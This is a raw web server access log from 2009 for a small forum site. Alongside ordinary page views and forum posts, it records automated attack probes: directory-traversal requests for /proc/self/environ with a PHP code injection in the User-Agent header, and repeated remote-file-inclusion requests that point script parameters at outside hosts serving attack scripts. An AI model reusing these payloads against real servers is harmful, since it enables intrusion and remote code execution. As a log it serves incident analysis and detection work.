124.0.55.226 - - [04/Jul/2009:19:06:07 -0700] "GET /logs/showfile.php/index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:19:06:13 -0700] "GET /logs/showfile.php/index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:19:06:14 -0700] "GET /index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 584 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:19:06:27 -0700] "GET /logs/showfile.php/access_090606.log/index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:19:06:33 -0700] "GET /logs/showfile.php/access_090606.log/index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
69.20.70.31 - - [04/Jul/2009:19:06:42 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
69.46.23.47 - - [04/Jul/2009:19:07:47 -0700] "POST /phpBB2/posting.php?sid=e71b27cb0ee5c22bc6672b27e0b3c669 HTTP/1.1" 200 13141 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:07:48 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 2252 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:07:48 -0700] "GET /logs/showfile.php/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 3345 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:07:48 -0700] "GET /index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 583 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:07:49 -0700] "GET /logs/showfile.php/access_090627.log%20%20/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:07:49 -0700] "GET /index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 583 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:07:49 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 2252 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:07:50 -0700] "GET /logs/showfile.php/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 3345 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:07:50 -0700] "GET /logs/showfile.php/access_090627.log%20%20/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
76.126.245.83 - - [04/Jul/2009:19:08:14 -0700] "GET /phpBB2/posting.php?mode=reply&t=1342&sid=109dd760d74e2f7844242b90b6710493 HTTP/1.0" 200 119758 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
76.126.245.83 - - [04/Jul/2009:19:08:31 -0700] "POST /phpBB2/posting.php?sid=f6dc22d0d6b45d229913ee22f22229ad HTTP/1.0" 200 13488 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=reply&t=1342&sid=109dd760d74e2f7844242b90b6710493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:08:49 -0700] "GET /logs/showfile.php/access_090627.log/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:08:49 -0700] "GET /logs/showfile.php/access_090627.log/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
65.17.253.220 - - [04/Jul/2009:19:08:50 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
209.235.254.107 - - [04/Jul/2009:19:10:03 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.90.164.110 - - [04/Jul/2009:19:10:11 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:11:08 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 591 "-" "libwww-perl/5.79" "webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:11:08 -0700] "GET /logs/showfile.php//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:11:09 -0700] "GET /logs/showfile.php/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
212.95.226.66 - - [04/Jul/2009:19:11:09 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:11:10 -0700] "GET /logs/showfile.php/access_090617.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:11:17 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 591 "-" "libwww-perl/5.79" "webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:11:17 -0700] "GET /logs/showfile.php/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:11:17 -0700] "GET /logs/showfile.php//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:11:18 -0700] "GET /logs/showfile.php/access_090617.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:11:25 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 591 "-" "libwww-perl/5.79" "webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:11:25 -0700] "GET /logs/showfile.php/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:11:25 -0700] "GET /logs/showfile.php/access_090617.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:11:25 -0700] "GET /logs/showfile.php//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:11:45 -0700] "GET /playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 595 "-" "Mozilla/5.0" "webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:11:45 -0700] "GET /logs/showfile.php/playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:11:45 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 600 "-" "Mozilla/5.0" "webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:11:45 -0700] "GET /logs/showfile.php/access.log%20%20/playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
65.55.210.65 - - [04/Jul/2009:19:11:45 -0700] "GET /phpBB2/viewtopic.php?t=31675 HTTP/1.1" 200 20042 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:11:56 -0700] "GET /index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 583 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:11:56 -0700] "GET /logs/showfile.php/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 3345 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:11:56 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 2252 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:11:56 -0700] "GET /logs/showfile.php/access_090627.log/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
62.149.226.208 - - [04/Jul/2009:19:11:59 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:12:00 -0700] "GET /index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 583 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:12:00 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 2252 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:12:00 -0700] "GET /logs/showfile.php/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 3345 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:12:00 -0700] "GET /logs/showfile.php/access_090627.log/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
96.31.68.140 - - [04/Jul/2009:19:12:10 -0700] "POST /phpBB2/posting.php?sid=92e01a5a856f18055d46020aa03c8238 HTTP/1.1" 200 13103 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:12:33 -0700] "GET /playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 595 "-" "Mozilla/5.0" "webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:12:33 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 600 "-" "Mozilla/5.0" "webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:12:34 -0700] "GET /logs/showfile.php/playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:12:34 -0700] "GET /logs/showfile.php/access.log%20%20/playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
89.171.190.110 - - [04/Jul/2009:19:12:59 -0700] "GET /logs/showfile.php/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
89.171.190.110 - - [04/Jul/2009:19:13:00 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 591 "-" "libwww-perl/5.79" "webmaster-showcase.net"
89.171.190.110 - - [04/Jul/2009:19:13:00 -0700] "GET /logs/showfile.php//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
89.171.190.110 - - [04/Jul/2009:19:13:01 -0700] "GET /logs/showfile.php/access_090617.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
81.23.146.4 - - [04/Jul/2009:19:13:06 -0700] "GET /phpBB2/posting.php?mode=newtopic&f=2&sid=da9ea8298771e2ad5bdb328877b12236 HTTP/1.0" 200 31479 "http://webmaster-showcase.net/phpBB2/posting.php?mode=newtopic&f=2&sid=da9ea8298771e2ad5bdb328877b12236" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)" "webmaster-showcase.net"
81.23.146.4 - - [04/Jul/2009:19:13:12 -0700] "POST /phpBB2/posting.php?sid=6ebfe8d4aa142e7538596591bbc5eb0e HTTP/1.0" 200 12915 "http://webmaster-showcase.net/phpBB2/posting.php?mode=newtopic&f=2&sid=da9ea8298771e2ad5bdb328877b12236" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)" "webmaster-showcase.net"
81.23.146.4 - - [04/Jul/2009:19:13:14 -0700] "GET /phpBB2/index.php HTTP/1.0" 200 16681 "http://webmaster-showcase.net/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)" "webmaster-showcase.net"
65.60.32.34 - - [04/Jul/2009:19:13:50 -0700] "POST /phpBB2/posting.php?sid=e75b527657eedaeb3177aa2e87baf289 HTTP/1.1" 200 13233 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:14:36 -0700] "GET /playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 595 "-" "Mozilla/5.0" "webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:14:36 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 600 "-" "Mozilla/5.0" "webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:14:36 -0700] "GET /logs/showfile.php/access.log%20%20/playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:14:36 -0700] "GET /logs/showfile.php/playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
65.55.110.91 - - [04/Jul/2009:19:14:51 -0700] "GET /phpBB2/viewtopic.php?t=31675 HTTP/1.0" 200 20026 "http://search.live.com/results.aspx?q=forum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
65.55.110.91 - - [04/Jul/2009:19:14:58 -0700] "GET /phpBB2/templates/subSilver/formIE.css HTTP/1.0" 200 354 "http://www.webmaster-showcase.net/phpBB2/viewtopic.php?t=31675" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:15:25 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 591 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:15:25 -0700] "GET /logs/showfile.php//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:15:25 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 597 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:15:25 -0700] "GET /logs/showfile.php/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:15:25 -0700] "GET /logs/showfile.php/access_090617.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:15:25 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 591 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:15:25 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 597 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:15:26 -0700] "GET /logs/showfile.php//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:15:26 -0700] "GET /logs/showfile.php/access_090617.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:15:26 -0700] "GET /logs/showfile.php/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
208.109.21.238 - - [04/Jul/2009:19:16:24 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
93.174.93.58 - - [04/Jul/2009:19:16:49 -0700] "GET /php/simple-php-guestbook/gbook.txt HTTP/1.1" 200 786432 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
66.232.97.145 - - [04/Jul/2009:19:18:08 -0700] "POST /phpBB2/posting.php?sid=94cb7a33e52bef2fb463a7f8d26245fb HTTP/1.1" 200 13264 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:18:12 -0700] "GET /logs/showfile.php/access_090617.log%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:18:14 -0700] "GET /logs/showfile.php/access.log%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:18:15 -0700] "GET /playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 599 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:18:15 -0700] "GET /logs/showfile.php/playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:18:15 -0700] "GET /logs/showfile.php/access_090523.log/playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:18:23 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 604 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:18:54 -0700] "GET /logs/showfile.php/access_090617.log%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:18:55 -0700] "GET /logs/showfile.php/access.log%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:19:17 -0700] "GET /logs/showfile.php/access_090617.log%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
66.46.177.182 - - [04/Jul/2009:19:19:20 -0700] "GET /logs/showfile.php/access.log%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.79" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:19:56 -0700] "GET /logs/showfile.php/access_090617.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:20:01 -0700] "GET /logs/showfile.php/access_090617.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:20:15 -0700] "GET /logs/showfile.php/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:20:30 -0700] "GET /index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 583 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:20:30 -0700] "GET /logs/showfile.php/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 3345 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:20:30 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 2252 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:20:30 -0700] "GET /logs/showfile.php/access_090627.log/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.46.23.47 - - [04/Jul/2009:19:21:36 -0700] "POST /phpBB2/posting.php?sid=e71b27cb0ee5c22bc6672b27e0b3c669 HTTP/1.1" 200 13217 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
69.20.70.31 - - [04/Jul/2009:19:21:40 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:21:49 -0700] "GET /playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 599 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:21:49 -0700] "GET /logs/showfile.php/playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:21:49 -0700] "GET /logs/showfile.php/access_090523.log/playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:21:50 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 604 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:23:09 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 591 "-" "Mozilla/5.0" "webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:19:23:09 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 597 "-" "Mozilla/5.0" "webmaster-showcase.net"
